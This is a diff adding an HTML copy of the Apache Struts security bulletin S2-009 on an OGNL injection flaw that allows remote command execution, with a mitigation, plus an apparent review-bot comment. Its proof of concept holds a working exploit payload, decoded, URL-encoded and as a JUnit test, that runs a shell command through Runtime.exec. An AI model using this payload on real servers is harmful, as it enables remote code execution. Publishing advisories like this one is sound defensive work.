+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <link href='http://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
+    <link href='http://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
+    <script src='http://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
+    
+    <script type="text/javascript">
+        SyntaxHighlighter.defaults['toolbar'] = false;
+        SyntaxHighlighter.all();
+    </script>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>S2-009</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="security-bulletins.html">Security Bulletins</a>&nbsp;&gt;&nbsp;<a href="s2-009.html">S2-009</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">S2-009</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=27836151">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=27836151">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=27836151">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=27836151">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=27836151">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=27836151">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent"><h2><a shape="rect" name="S2-009-Summary"></a>Summary</h2>
+
+
+<p>ParameterInterceptor vulnerability allows remote command execution</p>
+
+
+<div class="table-wrap">
+<table class="confluenceTable"><tbody><tr><th colspan="1" rowspan="1" class="confluenceTh">Who should read this</th><td colspan="1" rowspan="1" class="confluenceTd">All Struts 2 developers</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Impact of vulnerability</th><td colspan="1" rowspan="1" class="confluenceTd">Remote command execution</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Maximum security rating</th><td colspan="1" rowspan="1" class="confluenceTd">Critical</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Recommendation</th><td colspan="1" rowspan="1" class="confluenceTd">Developers should immediately upgrade to <a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts2312">Struts 2.3.1.2</a> or read the following solution instructions carefully for a configuration change to mitigate the vulnerability</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Affected Software</th><td colspan="1" r
 owspan="1" class="confluenceTd"> Struts 2.0.0 - Struts 2.3.1.1 </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Reporter</th><td colspan="1" rowspan="1" class="confluenceTd"> Meder Kydyraliev, Google Security Team </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">CVE Identifier</th><td colspan="1" rowspan="1" class="confluenceTd"><a shape="rect" class="external-link" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3923" rel="nofollow">CVE-2011-3923</a></td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Original Description</th><td colspan="1" rowspan="1" class="confluenceTd"> Reported directly to security@struts.a.o</td></tr></tbody></table>
+</div>
+
+<h2><a shape="rect" name="S2-009-Problem"></a>Problem</h2>
+
+<p>OGNL provides, among other features, extensive expression <a shape="rect" class="external-link" href="http://commons.apache.org/ognl/language-guide.html#Expression_Evaluation">evaluation capabilities</a>. The vulnerability allows a malicious user to bypass all the protections (regex pattern, deny method invocation) built into the ParametersInterceptor, thus being able to inject a malicious expression in any exposed string variable for further evaluation. </p>
+
+<p>A similar behavior was already addressed in <a shape="rect" href="s2-003.html" title="S2-003">S2-003</a> and <a shape="rect" href="s2-005.html" title="S2-005">S2-005</a>, but it turned out that the resulting fix based on whitelisting acceptable parameter names closed the vulnerability only partially. <br clear="none">
+Regular expression in ParametersInterceptor matches top['foo'](0) as a valid expression, which OGNL treats as (top['foo'])(0) and evaluates the value of 'foo' action parameter as an OGNL expression. This lets malicious users put arbitrary OGNL statements into any String variable exposed by an action and have it evaluated as an OGNL expression and since OGNL statement is in HTTP parameter value attacker can use blacklisted characters (e.g. #) to disable method execution and execute arbitrary methods, bypassing the ParametersInterceptor and OGNL library protections.</p>
+
+<h2><a shape="rect" name="S2-009-Proofofconcept"></a>Proof of concept</h2>
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>Vulnerable Action</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[
+public class FooAction {
+    private String foo;
+
+    public String execute() {
+        return "success";
+    }
+    public String getFoo() {
+        return foo;
+    }
+
+    public void setFoo(String foo) {
+        this.foo = foo;
+    }
+}
+
+]]></script>
+</div></div>
+
+<p>Here's an actual decoded example, which will create /tmp/PWNAGE directory:</p>
+
+<div class="preformatted panel" style="border-width: 1px;"><div class="preformattedContent panelContent">
+<pre>/action?foo=(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Runtime@getRuntime().exec('mkdir /tmp/PWNAGE'))(meh)&amp;z[(foo)('meh')]=true
+</pre>
+</div></div>
+
+<p>encoded version:</p>
+<div class="preformatted panel" style="border-width: 1px;"><div class="preformattedContent panelContent">
+<pre>/action?foo=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20@java.lang.Runtime@getRuntime%28%29.exec%28%27mkdir%20/tmp/PWNAGE%27%29%29%28meh%29&amp;z[%28foo%29%28%27meh%27%29]=true
+</pre>
+</div></div>
+
+<p>And the JUnit version</p>
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>PoC</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[
+public class FooActionTest extends org.apache.struts2.StrutsJUnit4TestCase&lt;FooAction&gt; {
+    @Test
+    public void testExecute() throws Exception {
+        request.setParameter("foo", "(#context[\"xwork.MethodAccessor.denyMethodExecution\"]= new " +
+                "java.lang.Boolean(false), #_memberAccess[\"allowStaticMethodAccess\"]= new java.lang.Boolean(true), " +
+                "@java.lang.Runtime@getRuntime().exec('mkdir /tmp/PWNAGE'))(meh)");
+
+        request.setParameter("top['foo'](0)", "true");
+
+        String res = this.executeAction("/example/foo.action");
+        FooAction action = this.getAction();
+
+        File pwn = new File("/tmp/PWNAGE");
+        Assert.assertFalse("Remote exploit: The PWN folder has been created", pwn.exists());
+    }
+}
+
+]]></script>
+</div></div>
+
+<h2><a shape="rect" name="S2-009-Solution"></a>Solution</h2>
+
+<p>The regex pattern inside the ParameterInterceptor was changed to provide a more narrow space of acceptable parameter names. <br clear="none">
+Furthermore the new setParameter method provided by the value stack will allow no more eval expression inside the param names.</p>
+
+
+<div class="panelMacro"><table class="warningMacro"><colgroup span="1"><col span="1" width="24"><col span="1"></colgroup><tr><td colspan="1" rowspan="1" valign="top"><img align="middle" src="https://cwiki.apache.org/confluence/images/icons/emoticons/forbidden.gif" width="16" height="16" alt="" border="0"></td><td colspan="1" rowspan="1"><b>It is strongly recommended to upgrade to <a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts2312">Struts 2.3.1.2</a>, which contains the corrected OGNL and XWork library.</b></td></tr></table></div>
+
+<p>In case an upgrade isn't possible in a particular environment, there is a configuration based mitigation workaround:</p>
+
+<h3><a shape="rect" name="S2-009-PossibleMitigationWorkaround%3AConfigureParametersIntercptorinstruts.xmltoExcludeMaliciousParameters"></a>Possible Mitigation Workaround: Configure ParametersIntercptor in struts.xml to Exclude Malicious Parameters</h3>
+
+<p>The following additional interceptor-ref configuration should mitigate the problem when applied correctly, allowing only simple navigational expression:</p>
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;interceptor-ref name="params"&gt;
+	&lt;param name="acceptParamNames"&gt;\w+((\.\w+)|(\[\d+\])|(\['\w+'\]))*&lt;/param&gt;
+&lt;/interceptor-ref&gt;
+]]></script>
+</div></div>
+<div class="panelMacro"><table class="noteMacro"><colgroup span="1"><col span="1" width="24"><col span="1"></colgroup><tr><td colspan="1" rowspan="1" valign="top"><img align="middle" src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif" width="16" height="16" alt="" border="0"></td><td colspan="1" rowspan="1">Beware that the above pattern breaks <a shape="rect" class="external-link" href="http://struts.apache.org/2.3.1.1/docs/type-conversion.html#TypeConversion-CollectionandMapSupport">the type conversion support for collection and map</a> (those parameter names should be attached to acceptParamNames variable).<br clear="none">
+For this configuration to work correctly, it has to be applied to <b>any params interceptor ref in any stack an application is using</b>.<br clear="none">
+E.g., if an application is configured to use defaultStack as well as paramsPrepareParamsStack, you should copy both stack definitions from struts-default.xml to the application's struts.xml config file and apply the described excludeParams configuration for each params interceptor ref, that is <b>once for defaultStack and twice for paramsPrepareParamsStack</b></td></tr></table></div></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file
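Review bot: The highlighter assets in the head are fetched over plaintext `http://struts.apache.org/...` (two stylesheets and the `shCore.js`/`shBrushJava.js` scripts), while `default.css` on the same page uses `https://`; script loaded over HTTP can be altered in transit and will be blocked as mixed content when the page itself is served over TLS, so the four `href`/`src` values should use `https://`. The mitigation note near the end refers to "the described excludeParams configuration", but the configuration actually shown sets `acceptParamNames`, so the sentence should read "apply the described acceptParamNames configuration" to avoid sending readers to the wrong parameter. The workaround heading also misspells the interceptor as "ParametersIntercptor".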


